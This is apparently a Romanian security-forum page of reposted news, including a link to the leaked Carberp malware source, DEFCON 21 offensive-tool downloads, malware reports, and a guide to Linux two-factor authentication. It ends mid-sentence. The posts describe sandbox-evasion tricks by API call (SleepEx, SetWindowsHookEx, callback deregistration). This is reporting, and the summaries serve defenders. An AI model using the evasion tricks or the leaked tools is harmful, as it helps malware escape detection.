Usr6

pe 25.06 a fost postat pe rst: https://rstforums.com/forum/71141-sursa-carberp-bootkit-other-c-projects-worth-60k.rst o poveste din spatele leak-ului: Touch My Malware: Carberp source code, days away from full leak Touch My Malware: Carberp source code now leaked

Google Code is Google’s official open source site meant for developers to host their program’s source code and related files, mostly in text format. However, using our sourcing system in Brazil, we were able to capture a malware written in Java that downloads BANKER malware from a recently created project called “flashplayerwindows”. Of course, this bogus project has nothing to do with Adobe. The said file (detected as JAVA_DLOAD.AFJ) is a compiled file that downloads and execute the “AdobeFlashPlayer.exe”, which we have verified to be malicious (detected as TROJ_BANLOAD.JFK). Once executed, this Trojan connects to Google Code to download other files. The people behind this threat may have uploaded these files to the said Google Code page, which notably include BANKER variants. These malware are notorious for stealing banking and email account information. Typically, they perform their data stealing routine by using phishing sites spoofing banking sites to lure users into disclosing information. Once they gather these data, they can use these to initiate unauthorized transactions such as money transfers. Previously, BANKER malware were seen hosted on compromised Brazilian government sites, which affected users from Brazil, the United States, and Angola. Another fraud project containing malware was also discovered, which goes to show that similar threats might still be out there. Besides the danger of the BANKER malware, this use of a well-known site like Google Code provides a good cover-up for cybercriminals. The malware being hosted in an official Google website means that downloading the malware will be encrypted with valid SSL certificates, which can bypass traditional security technologies. Because Google is a legitimate and reputable domain, traditional reputable services may not prevent the downloading. If this threat seems familiar, it’s because this abuse of open-source project sites has been done before. Last June, we blogged about GAMARUE variants being hosted on SourceForge, which like Google Code, is popular among developers and users alike. This incident shows that as we have predicted for 2013, legitimate cloud providers like Google Code are likely to come under attack this year. With services like Google Code are likely to increase traction among users, we can expect that similar cases will appear (and increase) in the coming days. Trend Micro protects users from this by detecting and deleting these BANKER variants. As of this writing, the said files are no longer available on Google Code. Sursa: BANKER Malware Found Hosted on Google Code | Security Intelligence Blog | Trend Micro

Folosind 82.944 de procesoare ale unuia dintre cele mai mari supercomputere din lume, oamenii de ?tiin?? au reu?it s? imite o secund? din activitatea creierului uman, în aproximativ 40 de minute. Cea mai mare simulare a unei re?ele neuronale din lume a fost realizat? de oamenii de ?tiin?? japonezi ?i germani care lucreaz? al?turi de Computerul K, o ma?in?rie japonez? care acum doi a fost recunoscut? drept cel mai rapid computer. Potrivit oamenilor de ?tiin?? a fost nevoie de 82.944 de procesoare pentru a simula în 40 de minte o singur? secund? de activitate neuronal?. Pentru ca simularea s? func?ioneze, oamenii de ?tiin?? au mai utilizat ?i 1,73 miliarde de neuroni vizuali conecta?i la 10,4 trilioane de sinapse. Fiecare sinaps? virtual?, care a fost pozi?ionat? între neuroni excitatori care con?ineau 24 de bytes de memorie, permi?ând astfel o descriere matematic? exact? a re?elei. Simularea, în sine, a fost realizat? pe baza unui software special pentru simulare, numit NEST, ?i a avut aproximativ un petabyte de memorie (echivalentul memoriei de?inute de 250.000 PC-uri). Simularea nu a fost conceput? pentru a imita activitatea real? a creierului uman (sinapsele fiind conectate la întâmplare), ci doar puterea re?elei. De?i ea a fost realizat? la o scar? foarte mare, simularea nu a reprezentat decât 1% din re?eaua neuronal? din creierul uman. „Dac? peta-computerele, precum compuertul K, sunt capabile s? imite 1% din re?eaua neuronal? din creierul uman, atunci ?tim c? simularea întregului creier se va putea realiza cu ajutorul cu ajutorul unor computere ?i mia performante de care sper?m s? dispunem în urm?torul deceniu”, a explicat Markus Diesmann. Sursa: Cât i-a trebuit unui super computer s? imite o secund? din activitatea neuronal? a creierului uman? Engleza: This computer took 40 minutes to simulate one second of brain activity

SPEAKER MATERIALS - LIST OF PRESENTATIONS: Abraham Kang and Dinis Cruz DEFCON-21-Kang-Cruz-RESTing-On-Your-Laurels-Will-Get-You-Pwned.pdf Alejandro Caceres DEFCON-21-Caceres-Massive-Attacks-With-Distributed-Computing.pdf Alexandre Pinto DEFCON-21-Pinto-Defending-Networks-Machine-Learning-WP.pdf DEFCON-21-Pinto-Defending-Networks-Machine-Learning.pdf Amber Baldet DEFCON-21-Baldet-Suicide-Intervention-Risk-Assessment-Tactics.pdf Andy Davis DEFCON-21-Davis-Revealing-Embedded-Fingerprints.pdf Balint Seeber DEFCON-21-Balint-Seeber-All-Your-RFz-Are-Belong-to-Me.pdf Bogdan Alecu DEFCON-21-Bogdan-Alecu-Attacking-SIM-Toolkit-with-SMS-WP.pdf DEFCON-21-Bogdan-Alecu-Business-Logic-Flaws-in-MO.pdf Brendan O'Connor DEFCON-21-OConnor-Stalking-a-City-for-Fun-and-Frivolity.pdf Brian Gorenc and Jasiel Spelman DEFCON-21-Gorenc-Spelman-Java-Every-days-WP.pdf DEFCON-21-Gorenc-Spelman-Java-Every-days.pdf Chris John Riley DEFCON-21-Riley-Defense-by-Numbers.pdf Chris Sumner and Randall Wald DEFCON-21-Sumner-Wald-Prediciting-Susceptibility-To-Social-Bots-On-Twitter.pdf Christine Dudley DEFCON-21-Dudley-Privacy-In-DSRC-Connected-Vehicles.pdf Craig Young DEFCON-21-Young-Google-Skeleton-Key.pdf ---Extras DEFCON-21-Craig-Young-Android-PoC-StockView-with-SSL.apk DEFCON-21-Craig-Young-Android-PoC-StockView.apk DEFCON-21-Craig-Young-Android-PoC-TubeApp.apk DEFCON-21-Craig-Young-StockView-ExampleCode.java Crowley and Panel DEFCON-21-Crowley-Savage-Bryan-Home-Invasion-2.0-WP.pdf DEFCON-21-Crowley-Savage-Bryan-Home-Invasion-2.0.pdf | ---Extras ---upnp_request_gen LICENSE.txt readme.txt upnp_request_gen.php Dan Griffin DEFCON-21-Dan-Griffin-Protecting-Data.pdf Daniel Chechik DEFCON-21-Chechik-Utilizing-Popular-Websites-for-Malicious-Purposes-Using-RDI.pdf Daniel Selifonov DEFCON-21-Selifonov-A-Password-is-Not-Enough-Why-Disk-Encryption-is-Broken.pdf Eric Fulton and Daniel Zolnikov DEFCON-21-Fulton-Zolnikov-The-Politics-of-Privacy-and-Technology.pdf Eric Milam DEFCON-21-Milam-Getting-The-Goods-With-smbexec.pdf Eric Robi and Michael Perklin DEFCON-21-Robi-Perklin-Forensic-Fails.txt Etemadieh and Panel DEFCON-21-Etemadieh-Panel-Google-TV-Secure-Boot-Exploit-GTVHacker.pdf Fatih Ozavci DEFCON-21-Ozavci-VoIP-Wars-Return-of-the-SIP.pdf | ---Extras DEFCON-21-viproy-voipkit.tgz Flipper DEFCON-21-Flipper-10000-Yen.pdf | ---Extras | Defcon 21 - 10000 Yen Source Code.txt | OpenGlider BoM.pdf | OpenGlider V0.1.x_t.txt | x35 coordinates.sldcrv.txt | ---OpenGlider IGES Files Franz Payer DEFCON-21-Payer-Exploiting-Music-Streaming-with-JavaScript.pdf Gregory Pickett DEFCON-21-Pickett-Lets-Screw-With-NMAP.pdf | ---Extras DEFCON-21-Pickett-Lets-Screw-With-NMAP-Specifications.pdf DEFCON-21-Pickett-Lets-Screw-With-NMAP-Transformations.pdf platform.zip scans.zip Hunter Scott DEFCON-21-Scott-Security-in-Cognitive-Radio-Networks.pdf Jacob Thompson DEFCON-21-Thompson-CREAM-Cache-Rules-Evidently-Ambiguous-Misunderstood.pdf Jaeson Schultz DEFCON-21-Schultz-Examining-the-Bitsquatting-Attack-Surface-WP.pdf Jason Staggs DEFCON-21-Staggs-How-to-Hack-Your-Mini-Cooper-WP.pdf DEFCON-21-Staggs-How-to-Hack-Your-Mini-Cooper.pdf | ---Extras DEFCON-21-CANClockProof-of-ConceptDemo.wmv DEFCON-21-CANClockSource.pde DEFCON-21-MINI-Cooper-Crash-Test.wmv Jim Denaro DEFCON-21-Denaro-How-to-Disclose-or-Sell-an-Exploit.pdf Joe Bialek DEFCON-21-Bialek-PowerPwning-Post-Exploiting-by-Overpowering-Powershell.pdf | ---Extras DEFCON-21-Invoke-ReflectivePEInjection.ps1.txt Joe Grand DEFCON-21-Grand-JTAGulator.pdf | ---Extras | DEFCON-21-jtagulatorassembly.pdf | DEFCON-21-jtagulatorblockdiagram.pdf | DEFCON-21-jtagulatorbom.pdf | DEFCON-21-jtagulatorschematic.pdf | DEFCON-21-jtagulatortestproc.pdf | Firmware 1.1 (b9b49b3) ---Gerbers B John Ortiz DEFCON-21-Ortiz-Fast-Forensics-Using-Simple-Statistics-and-Cool-Tools.pdf | ---Extras DEFCON-21-Ortiz-TOOLSCustom.zip DEFCON-21-Ortiz-TOOLSFreeDownload.zip Joseph Paul Cohen | ---Extras | DEFCON-21-blucat.base64 | ---blucat-r50 Justin Engler and Paul Vines DEFCON-21-Engler-Vines-Electromechanical-PIN-Cracking-WP.pdf DEFCON-21-Engler-Vines-Electromechanical-PIN-Cracking.pdf | ---Extras DEFCON-21-Codepartslistinstructions.zip Justin Hendricks DEFCON-21-Justin-Hendricks-So-You-Think-Your-Domain-Controller-Is-Secure.pdf Karl Koscher and Eric Butler DEFCON-21-Koscher-Butler-The-Secret-Life-of-SIM-Cards.pdf Lawrence and Panel DEFCON-21-Lawrence-Johnson-Karpman-Key-Decoding-and-Duplication-Schlage.pdf | ---Extras DEFCON-21-config.scad DEFCON-21-key.scad Marc Weber Tobias and Tobias Bluzmanis DEFCON-21-Tobias-Bluzmanis-Insecurity-A-Failure-of-Imagination.pdf Marion Marschalek DEFCON-21-Marschalek-Thorny-Malware.pdf | ---Extras DEFCON-21-Marschalek-MalwareBase64.txt DEFCON-21-Marschalek-Thorny-Malware-Analysis-Report.pdf Melissa Elliott DEFCON-21-Elliott-noisefloor-URLS-reference.txt Michael Perklin DEFCON-21-Perklin-ACL-Steganography.pdf.pdf | ---Extras | ACLEncode.sln | README.txt | Michael Schrenk DEFCON-21-Schrenk-How-my-Botnet-Defeated-Russian-Hackers.pdf Ming Chow DEFCON-21-Chow-Abusing-NoSQL-Databases.pdf Neil Sikka DEFCON-21-Sikka-EMET-4.0-PKI-Mitigation.pdf Nicolas Oberli DEFCON-21-Oberli-Please-Insert-Inject-More-Coins.pdf Nikhil Mittal DEFCON-21-Mittal-Powerpreter-Post-Exploitation-Like-a-Boss.pdf | ---Extras Nikhil_Mittal_Powerpreter_Code.psm1 Pau Oliva Fora DEFCON-21-Fora-Defeating-SEAndroid.pdf Philip Polstra DEFCON-21-Polstra-We-are-Legion-Pentesting.pdf | ---Extras DEFCON-21-Philip-Polstra-code.py.txt Phorkus and Evilrob DEFCON-21-Phorkus-Evilrob-Hacking-Embedded-Devices-Bad-things-to-Good-hardware.pdf Piotr Duszynski DEFCON-21-Duszynski-Cyber-Offenders.pdf Pukingmonkey DEFCON-21-Pukingmonkey-The-Road-Less-Surreptitiously-Traveled.pdf | ---Extras 01_ALPR_detector_proof_of_concept.mp4 02_ezpass_detector_of_open_road_tolling.mp4 03_ezpass_detector_of_hidden_reader.mp4 04_ezpass_detector_of_hidden_reader_with_toll_tag_sensor.mp4 DEFCON-21-05ezpassdetectortimessquaretomsgin90seconds-(1).mp4 DEFCON-21-05ezpassdetectortimessquaretomsgin90seconds.mp4 arduino-micro Remy Baumgarten DEFCON-21-Baumgarten-Mach-O-Viz-WP.pdf DEFCON-21-Baumgarten-Mach-O-Viz.pdf Richard Thieme DEFCON-21-Richard-Thieme-UFOs-and-Govt.pdf | ---Extras DEFCON-21-Richard Thieme-UFOs-and-Govt-Resources.txt Ricky HIll DEFCON-21-Ricky-Hill-Phantom-Drone.pdf Robert Clark DEFCON-21-Clark-Legal-Aspects-of-Full-Spectrum-Computer-Network-Active-Defense.pdf Robert Stucke DEFCON-21-Stucke-DNS-Hazards.pdf Runa A Sandvik DEFCON-21-Sandvik-Safety-of-the-Tor-Network.pdf Ryan Holeman DEFCON-21-Holeman-The-Bluetooth-Device-Database.pdf ---Extras ---src analytics Sam Bowne DEFCON-21-Bowne-SSD-Data-Evap.pdf Sam Bowne and Matthew Prince DEFCON-21-Bowne-Prince-Evil-DoS-Attacks-and-Strong-Defenses.pdf Scott Behrens and Brent Bandelgar DEFCON-21-Behrens-Bandelgar-MITM-All-The-IPv6-Things.pdf Teal Rogers and Alejandro Caceres DEFCON-21-Rogers-Caceres-The-Dawn-of-Web-30.pdf Tom Keenan DEFCON-21-Tom-Keenan-Torturing-Open-Government-Systems-for-Fun.pdf Tom Steele and Dan Kottman DEFCON-21-Steele-Kottman-Collaborative-Penetration-Testing-With-Lair.pdf Tony Mui and Wai-leng DEFCON-21-Miu-Lee-Kill-em-All-DDoS-Protection-Total-Annihilation.pdf | ---Extras Vaagn Toukharian and Tigran Gevorgyan DEFCON-21-Toukharian-Gevorgyan-HTTP-Time-Bandit.pdf Wesley McGrew DEFCON-21-McGrew-Pwn-The-Pwn-Plug .pdf DEFCON-21-McGrew-Pwn-The-Pwn-Plug-WP.pdf | ---Extras DEFCON-21-community1.1vswireless1.1.txt DEFCON-21-exploitpacketpayload.dat DEFCON-21-originalubootenv.txt DEFCON-21-ubi.py WiK and Mubix DEFCON-21-WiK-Mubix-gitDigger.pdf Zak Blacher DEFCON-21-Blacher-Transcending-Cloud-Limitations.pdf | ---Extras DEFCON-21-Scripted-Demo.tar DEFCON-21-source-Code-dpk-master.zip Zoz DEFCON-21-Zoz-Hacking-Driverless-Vehicles.pdf bughardy and Eagle1753 DEFCON-21-bughardy-Eagle1753-OPT-circumventing-in-MIFARE-ULTRALIGHT-WP.pdf DEFCON-21-bughardy-Eagle1753-OPT-circumventing-in-MIFARE-ULTRALIGHT.pdf m0nk DEFCON-21-m0nk-BoutiqueKit.pdf soen DEFCON-21-soen-Evolving-Exploits-Through-Genetic-Algorithms.pdf Download: http://www.mediafire.com/download/15p2r0tk1787h30/Defcon_21_-_2013_Speaker_Presentations_DVD.zip Mirror: https://rstforums.com/fisiere/defcon.zip Sursa: contagio: Defcon 21 Archives Speaker Materials

@ studentul, din http://tsyrklevich.net/tbb_payload.txt"... includes the host name (via gethostname()) and the MAC address of the local host" da, ai dreptate e greu sa se duca la providerul de net sa-i ceara adresa celui care la ora 20:02 avea ip-ul respectiv, poate ai uitat ca toti providerii de net sunt obligati sa tina 6 luni loguri (ora conectarii ora deconectarii, etc) sau si mai simplu sa ceara date despre cine e titularul contractului pc-ului cu mac-ul x (fiind in lan provideru stie toate mac-urile din retea) avand MAC-ul ii cam doare la basca daca respectivul elimina probele de pe hdd sau chiar il arunca pe geam L.E. @daat: avand mac-ul pc-ului care a vizitat site-ul respectivii nu vor putea invoca faptul ca pc lor a fost hacuit si facut proxy, daca au reusit sa le obtina ip lor real ii identifica. schimbat placa de retea de 5 ori pe zi ai uitat ca provideri au loguri: user: mac: ip : ora conectat : ora deconectat cand in ultimile 5 luni ai avut acelasi MAC, nu poti sa invoci ca ti-ai schimbat placa sau a venit vecinu sau etc:))

Un start-up cu sediul in Helsinki a dezvoltat primul sistem de plata cu recunoastere faciala din lume. Independent.co.uk scrie ca acest sistem nou va transforma in esenta fata dumneavoastra intr-un cod PIN si chiar daca cineva isi va face operatie estetica sa arate exact ca dumneavoastra, sistemul va reusi sa faca diferenta dintre original si copie. Oricum, operatia ar putea sa coste mai mult decat are victima bani in cont. Denumita „cel mai rapid sistem de plata din lume”, tehnologia va recunoaste indivizii din momenul in care se apropie de casa de plata, britanicii notand ca „intregul proces de plata se va putea efectual astfel in aproximativ 5 secunde.” Momentan, aceasta idee pare riscanta, insa producatorii softului spun ca se bazeaza pe "algoritmi militari” si va fi aproape imposibil de spart acest sistem. Chiar si in cazul asta, noi am accentua pe cuvantul "aproape”. "Camerele noastre nu folosesc fotografii, ci un model matematic al fetei, ceea ce inseamna ca fiecare va fi unic”, spune Ruslan Pisarenko, directorul de dezvoltare al start-upului Uniqul. "Chiar si gemenii vor fi diferentiati. Am fost intrebati si despre cei care isi fac operatii estetice. Sistemul va reusi sa recunoasca si diferentieze daca o persoana este reala sau este doar o masca.”, a mai declarat acesta. Uniqul vrea sa implementeze primele sisteme de acest gen in decurs de o luna, iar daca acestea vor da rezultate, atunci planuieste sa extinda proiectul. Un lucru e cert. Sunt sanse mari ca un clovn aflat la locul de munca sa aiba probleme sa-si scoata banii folosind acest sistem. In rest, ideea suna excelent. Sau "aproape” excelent, ca sa revin la o idee de mai sus. sursa: Finlanda anunta "cel mai rapid sistem de plata din lume".Recunoasterea faciala, in locul codului PIN

A claimed zero-day vulnerability in Firefox 17 has some users of the latest Mozilla Firefox browser (Firefox 22) shrugging their shoulders. Indeed, for now it appears that this flaw is not a concern for regular, up-to-date Firefox end users. But several experts say the vulnerability was instead exposed and used in tandem with a recent U.S. law enforcement effort to discover the true Internet addresses of people believed to be browsing child porn sites via the Tor Browser — an online anonymity tool powered by Firefox 17. Tor software protects users by bouncing their communications across a distributed network of relays run by volunteers all around the world. As the Tor homepage notes, it prevents anyone who might be watching your Internet connection from learning what sites you visit, it prevents the sites you visit from learning your physical location, and it lets users access sites that are blocked by Internet censors. The Tor Browser bundle also is the easiest way to find Web sites that do not want to be easily taken down, such as the Silk Road (a.k.a. the “eBay of hard drugs“) and sites peddling child pornography. On Saturday, Aug. 3, 2013, Independent.ie, an Irish news outlet, reported that U.S. authorities were seeking the extradition of Eric Eoin Marques, a 28-year-old with Irish and American citizenship reportedly dubbed by the FBI as “the largest facilitator of child porn on the planet.” According to the Independent, Marques was arrested on a Maryland warrant that includes charges of distributing and promoting child porn online. The Tor Project’s blog now carries a post noting that at approximately midnight on August 4th “a large number of hidden service addresses disappeared from the Tor Network, sites that appear to have been tied to an organization called Freedom Hosting – a hosting service run on the Tor Network allegedly by Marques. Hidden services can be used to run a variety of Web services that are not directly reachable from a normal Internet connection — from FTP and IRC servers to Web sites. As such, the Tor Network is a robust tool for journalists, whistleblowers, dissidents and others looking to publish information in a way that is not easily traced back to them. “There are rumors that a hosting company for hidden services is suddenly offline and/or has been breached and infected with a javascript exploit,” writes “phobos,” a Tor Project blogger. Phobos notes that the person, or persons, who run Freedom Hosting are in no way affiliated or connected to The Tor Project, Inc., the organization coordinating the development of the Tor software and research, and continues: “The current news indicates that someone has exploited the software behind Freedom Hosting. From what is known so far, the breach was used to configure the server in a way that it injects some sort of javascript exploit in the web pages delivered to users. This exploit is used to load a malware payload to infect user’s computers. The malware payload could be trying to exploit potential bugs in Firefox 17 ESR, on which our Tor Browser is based. We’re investigating these bugs and will fix them if we can.” Even if the claimed vulnerability is limited to Firefox version 17, such a flaw would impact far more than just Tor bundle users. Mozilla says it has been notified of a potential security vulnerability in Firefox 17, which is currently the extended support release (ESR) version of Firefox. Last year, Mozilla began offering an annual ESR of Firefox for enterprises and others who didn’t want to have to keep up with the browser’s new rapid release cycle. “We are actively investigating this information and we will provide additional information when it becomes available,” Michael Coates, director of security assurance at Mozilla, wrote in a brief blog post this evening. Ofir David, head of intelligence for Israeli cybersecurity firm Cyberhat, said he believes the now-public exploit code is indeed related to Marques’ arrest. David said someone appears to have gained access to Freedom Hosting and injected malicious HTML code that checks the visitor’s browser to see if he is using Firefox 17. If so, the code silently redirects that visitor’s browser to another site which generates a unique identifier called a ‘UUID.’” David said that although the exploit can be used to download and run malicious code on the visitor’s computer, whoever infiltrated Freedom Hosting appear to have only used the exploit to gather the true Internet addresses of people visiting the child porn sites hosted there. “Ironically, all [the malicious code] does is perform a GET request to a new domain, which is hosted outside of the Tor network, while transferring the same UUID,” David said. “That way, whoever is running this exploit can match any Tor user to his true Internet address, and therefore track down the Tor user.” For more on this developing story, check out this Reddit thread. Also, Mozilla has an open Bugzilla entry analyzing the exploit code. Sursa: Firefox Zero-Day Used in Child Porn Hunt? — Krebs on Security pe acelasi subiect: Alleged Tor hidden service operator busted for child porn distribution: ... The servers themselves are likely run on a "bulletproof" hosting service in Romania or Russia; Irish law enforcement authorities told the court Friday that Marques had transferred large sums of money to accounts in Romania and had been investigating obtaining a visa to enter Russia. Marques, for his part, claimed that he was helping out friends in Romania... Alleged Tor hidden service operator busted for child porn distribution | Ars Technica

Information security firm Trustwave has reported a potential cyber-attack vector to a device you may have never expected the phrase "security vulnerability" would be applied (other than in reference to the end of a toilet paper roll, that is). In an advisory issued August 1, Trustwave warned of a Bluetooth security vulnerability in Inax's Satis automatic toilet. Functions of the Satis—including the raising and lowering of its lid and operation of its bidet and flushing nozzles—can be remotely controlled from an Android application called "My Satis" over a Bluetooth connection. But the Bluetooth PIN to pair with the toilet—"0000"—is hard-coded into the app. "As such, any person using the 'My Satis' application can control any Satis toilet," the security advisory noted. "An attacker could simply download the 'My Satis' application and use it to cause the toilet to repeatedly flush, raising the water usage and therefore utility cost to its owner. Attackers could cause the unit to unexpectedly open/close the lid, [or] activate bidet or air-dry functions, causing discomfort or distress to user." And you thought the only thing you had to worry about was dropping your phone into the toilet. Sursa: Holy sh*t! Smart toilet hack attack! | Ars Technica

We can already use two-step authentication in GMail with the Google Authenticator Android app. The idea is creating a secret key shared between the service and the Android app, so every 30 seconds we get a randomly generated token on Android that must be provided to login in addition to the password. That token is only valid in that 30s time frame. Since this provides a nice second security layer to our logins, why don't take advantage of it also in our Linux box? We'll need two things to get started: Install Google Authenticator on our Android, iOS or Blackberry phone. Install the PAM on our Linux box The first step is frivolous, so we will just move on to the second one. To setup two-factor authentication for your Linux server you will need to download and compile the PAM module for your system. The examples here will be based on CentOS 6, but it should be easy enough to figure out the equivalents for whatever distribution you happen to be using. Here is a link with similar steps for Ubuntu/Debian or any OS using Aptitude. $ sudo yum install pam-devel $ wget https://google-authenticator.googlecode.com/files/libpam-google-authenticator-1.0-source.tar.bz2 $ tar xvfj libpam-google-authenticator-1.0-source.tar.bz2 $ cd libpam-google-authenticator-1.0 $ make $ sudo make install $ sudo vim /etc/pam.d/sshd Once the PAM module and the command-line google-authenticator application are installed, you need to edit the /etc/pam.d/sshd file to add the below code to the very top of the file. auth required pam_sepermit.so auth required pam_google_authenticator.so auth include password-auth Additionally, you may wish to add the two-step authentication to your display manager (kdm, gdm, or lightdm). Depending on your distro you might be using a different login manager. Pick and edit the correct file among these: · /etc/pam.d/gdm · /etc/pam.d/lightdm · /etc/pam.d/kdm Add this line at the bottom: auth required pam_google_authenticator.so Once we have that installed we will run this command with the user we want to use two-step authentication with. If we want to use it for several users we will have to run it once with each of them, since it generates a unique secret key each time: % google-authenticator Do you want me to update your "~/.google_authenticator" file (y/n) y https://www.google.com/chart?chs=200x200&chld=M|0&cht=qr&chl=otpauth://totp/user@server%3Fsecret%3DABCD12E3FGHIJKLMN Your new secret key is: ABCD12E3FGHIJKLMN Your verification code is 98765432 Your emergency scratch codes are: 01234567 89012345 67890123 45678901 23456789 Do you want to disallow multiple uses of the same authentication token? This restricts you to one login about every 30s, but it increases your chances to notice or even prevent man-in-the-middle attacks (y/n) y By default, tokens are good for 30 seconds and in order to compensate for possible time-skew between the client and the server, we allow an extra token before and after the current time. If you experience problems with poor time synchronization, you can increase the window from its default size of 1:30min to about 4min. Do you want to do so (y/n) n If the computer that you are logging into isn't hardened against brute-force login attempts, you can enable rate limiting for the authentication module. By default, this limits attackers to no more than 3 login attempts every 30s. Do you want to enable rate-limiting (y/n) y Once you see the above text in your terminal window, the very next thing you will do is launch your web browser and point it to the URL shows towards the top of the text above. You should now see is a big QR code. Open your Google Authenticator app on your phone of choice and hit the menu button then select "Scan barcode". Point the camera to the QR code on the screen and you'll get a new item on the Google Authenticator main screen with an ID for the user and computer and the generated token below, along with a counter showing how much time is left for the code to expire. TIP: time is very important, so your Linux server should have an NTP client installed in order to keep the time accurate. You should definitely keep an eye on this, and if you have any trouble you may have to open the window size as noted by google-authenticator. TIP: You will also need to edit /etc/ssh/sshd_config to enable "ChallengeResponseAuthentication" and "UsePAM" (set them both to "yes"). Finally, you will restart sshd to commit the changes you just made. When this is done, try logging into the system via SSH: % ssh <your server> Verification code: Password: Last login: Tue May 10 11:54:21 2011 from client.example.com You must provide the verification code as presented by your phone in order to log in. Even if the password is known, without the verification code, the login will fail. Important: you will not be able to use this method if you use ssh private/public keys as the two are mutually exclusive. The two step authentication will keep users out of you box as long as they don't also have access to your phone, but you shouldn't forget that there's no way to really secure a box if the attacker has physical access to it. The secret key is stored in your home folder. The attacker could boot your box from a Live CD, get the key and generate tokens and have access to your Linux server. Then again same thing holds true for you user password so that's not to say that two step authentication is not secure, it's just that is has the same problems as any other login method when it comes with physically accessible machines. Sursa: ISC Diary | How To: Setting Up Google's Two-Factor Authentication In Linux

Diamonds are a girl’s best friend. Prime numbers are a mathematician’s best friend. And file-based sandboxes are an IT security researcher’s best friend. Unfortunately, malware authors know this. Aware that researchers are using sandboxes to monitor file behavior, attackers are building sandbox-evading techniques into new advanced persistent threat (APT) attacks — and even using these tricks to resurrect notorious malware classics. As my colleague Zheng Bu and I explain in an upcoming presentation at the Black Hat USA conference, malware is using a variety of checks to determine whether it is running in a sandbox and “play dead” until it reaches a live target. These checks fall into several categories: Human interaction — mouse clicks and dialog boxes Configuration-specific — sleep calls, time triggers, and process hiding Environment-specific — version, embedded iframes, and DLL loaders VMware-specific — system-service lists, unique files, and the VMX port Here are a few recent examples we have found. Khelios The Khelios botnet, declared dead in 2011, has since resurrected. To evade detection within file-based sandboxes, one of the new Khelios samples (also known as the Trojan Nap) found in 2013, calls the SleepEx() API with a 10-minute time out. Because most sandboxes are set to execute a sample for a short time frame (usually seconds), the Nap sample simply delays malicious activity beyond the monitored time period of most sandboxes to evade detection. The sample called to the undocumented Windows API function NtDelayExecution() to perform an extended sleep call. Poison Ivy The infamous remote-access tool Poison Ivy, which has been used extensively in targeted attacks, appears to have not been significantly updated since 2008. But a 2012 sample of the Trojan UpClicker, which is used as a wrapper around Poison IVY, employs the SetWindowsHookEX() API function to hide its malicious activity. By sending 0EH as the parameter to the function, the malicious code is activated only when the left mouse button is clicked and released. Because most file-based sandboxes do not mimic human interaction, this malware remains dormant during analysis and evades detection. PushDo PushDo, yet another infamous malware example, checks the build number of the Windows OS. Once identified, it finds a pointer to the PspCreateProcessNotify() API routine, to deregister all existing process callbacks — including any of the sandbox’s monitoring modules. Once all callbacks are deregistered, the malware creates and deletes processes without being detected. Hastati Trojan Hastati was designed to wipe out all the hard drives of a computer in Korea. It used the GetLocalTime() API function to activate itself at 2 PM on March 20, 2013. If the sample is monitored in a file-based sandbox before that time and date, it does not execute, evading detection. UpClicker, PushDo, and Nap are just some of the resurrected advanced malware that use evasion techniques against file-based sandboxes. In first part of our Black Hat presentation, we provide an in-depth, technical analysis of these evasion methods, which bypass sandboxes commonly used by the anti-virus industry. The talk also compares the effectiveness of three file-based sandboxes in detecting these tactics. And we will provide a live demonstration of some of these anti-analysis techniques operating in the wild. Sursa: Hot Knives Through Butter: Bypassing File-based Sandboxes | FireEye Blog

Cercet?torii au reu?it s? implanteze amintiri false în creier ?i au în?eles de ce rememor?m evenimente ce nu au avut loc V-a?i amintit vreodat? un eveniment într-un mod complet gre?it, având totodat? convingerea c? acesta a avut loc exact a?a cum vi-l aminti?i? Majoritea oamenilor au avut parte de o asemenea senza?ie ce atest? c? memoria uman? nu este întotdeauna de încredere Un nou studiu arat? c? amintirile false sunt foarte u?or de generat. Cercet?torii de la Riken–MIT Center for Neural Circuit Genetics au creat amintiri false în creierul ?oarecilor folosind o metod? despre care spun c? ar func?iona ?i în cazul oamenilor. Cercet?torii au folosit o tehnic? ce presupune activarea neuronilor cu ajutorul luminii pentru a antrena ?oarecii s?-?i „aminteasc?” o experien?? dureroas? într-un context complet diferit de cel în care au experimentat cu adev?rat durerea. Amintirile false au fost codificate în creier de celule cerebrale în acela?i mod în care sunt codificate amintirile reale. Chiar ?i f?r? manipularea efectuat? de oamenii de ?tiin??, amintirile nu sunt de încredere. Numeroase studii au ar?tat limitele m?rturiilor din s?lile de judecat?, îns? foarte pu?ine studii au analizat modul în care sunt formate amintirile false la nivel celular. „În rândul oamenilor, fenomenul amintirilor false este foarte bine cunoscut de cercet?tori, iar în anumite cazuri a avut consecin?e legale serioase”, a explicat cercet?torul Susumu Tonegawa, un specialist în neuro?tiin?e de la MIT. Atunci când creierul formeaz? o amintirie, o popula?ie de celule cerebrale trece prin schimb?ri fizice sau chimice de durat?. Amintirea are dou? etape: mai întâi, amintirea este creat? prin activarea acestor celule cerebrale. Ulterior, ea este reamintit? prin reactivarea acestor celule. Oamenii de ?tiin?? au lansat ipoteza c? aceste celule ale memoriei exist?, îns? nu reu?iser? niciodat? s? demonstreze prezen?a lor. Anul trecut, Tonegawa ?i colegii s?i au ar?tat c? aceste celule exist? într-o zon? a hipocampului, centrul memoriei din creier. Cercet?torii au modificat genetic ?oareci pentru a face anumi?i neuroni sensibili la lumin? – o tehnic? ce poart? numele de optogenetic? – astfel c? puteau activa aceste celule prin expunerea lor la lumin? albastr?. ?oarecii au fost pu?i într-o camer? în care au avut parte de ?ocuri la picioare, f?cându-o s? „înghe?e” de fric?. Animalele au înv??at s? asocieze ?ocurile cu respectiva camer?, formând o amintire a fricii. Ulterior, cercet?torii au pus ?oarecii într-o camer? diferit? ?i au expus la lumin? albastr? celulele care codificau amintirea fricii. Animalele au reac?ionat la fel de însp?imântate ca atunci când se aflau în prima camer?. În cea mai recent? cercetare, grupul de cercet?tori condus de Tonegawa a dus experimentul un pas mai departe. Mai întâi, oamenii de ?tiin?? au permis ?oarecilor s? exploreze prima camer? f?r? a avea parte de un ?oc la picioare. Apoi au pus ?oarecii într-o alt? camer?, în care le-au produs ?ocuri la picioare în timp ce expuneau celulele care codificau amintirea primei camere la lumin? albastr?. Cercet?torii doreau s? afle dac? atunci când puneau ?oarecii înapoi în prima camer? ace?tia vor reac?iona ca ?i cum ar fi fost ?oca?i în interiorul ei. ?oarecii au reac?ionat exact în acest mod, ar?tându-se speria?i când au fost pu?i în prima camer?, de?i nu experimentaser? niciun ?oc acolo. Cercet?torii au reu?it, astfel, s? implanteze o amintire fals? în mintea ?oarecilor. Rezultatele studiului sunt detaliate în jurnalul Science. „Amintirile sunt produse de experien??”, a declarat Tonegawa. Totu?i, în acest caz, animalul nu experimentase un moment de fric? în prima camer?, îns? îi era fric? de 